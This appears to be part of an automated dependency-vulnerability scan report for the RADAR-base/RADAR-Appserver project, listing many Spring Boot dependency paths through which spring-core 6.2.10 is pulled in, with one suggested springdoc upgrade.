Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
